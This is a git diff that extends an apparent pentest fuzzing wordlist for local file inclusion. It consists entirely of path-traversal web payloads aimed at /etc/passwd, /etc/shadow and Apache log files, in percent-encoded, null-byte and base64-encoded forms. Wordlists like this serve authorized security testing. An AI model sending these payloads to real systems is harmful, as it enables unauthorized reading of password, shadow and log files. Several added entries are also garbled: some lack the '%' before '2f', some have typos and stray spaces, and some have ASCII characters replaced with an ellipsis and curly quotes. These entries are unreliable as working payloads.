diff --git a/Fuzzing/JHADDIX_LFI.txt b/Fuzzing/JHADDIX_LFI.txt index 8c66b3f..6f10e3f 100755 --- a/Fuzzing/JHADDIX_LFI.txt +++ b/Fuzzing/JHADDIX_LFI.txt @@ -1,5 +1,5 @@ /.../.../.../.../.../ -\..\\\..\\\..\\\ +\…..\\\…..\\\…..\\\ %00../../../../../../etc/passwd %00/etc/passwd%00 %00../../../../../../etc/shadow @@ -20,7 +20,7 @@ ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd ..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow -=3D /.. . %2f.. +=3D “/..” . “%2f.. ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini admin/access_log /admin/install.php @@ -739,4 +739,129 @@ users/.htpasswd /..\..\..\..\..\..\winnt\win.ini /www/logs/proftpd.system.log /xampp\apache\bin\php.ini -/.Xauthority \ No newline at end of file +/.Xauthority +..2fapache2flogs2ferror.log +..2fapache2flogs2faccess.log +..2f..2fapache2flogs2ferror.log +..2f..2fapache2flogs2faccess.log +..2f..2f..2fapache2flogs2ferror.log +..2f..2f..2fapache2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log +..2fetc2fpasswd +..2fetc2fpasswd%00 +..2f..2fetc2fpasswd +..2f..2fetc2fpasswd%00 +..2f..2f..2fetc2fpasswd +..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 +L2V0Yy9tYXN0ZXIucGFzc3dk +L21hc3Rlci5wYXNzd2Q= +ZXRjL3Bhc3N3ZA== +ZXRjL3NoYWRvdyUwMA== +L2V0Yy9wYXNzd2Q= +L2V0Yy9wYXNzd2QlMDA= +Li4vZXRjL3Bhc3N3ZA== +Li4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==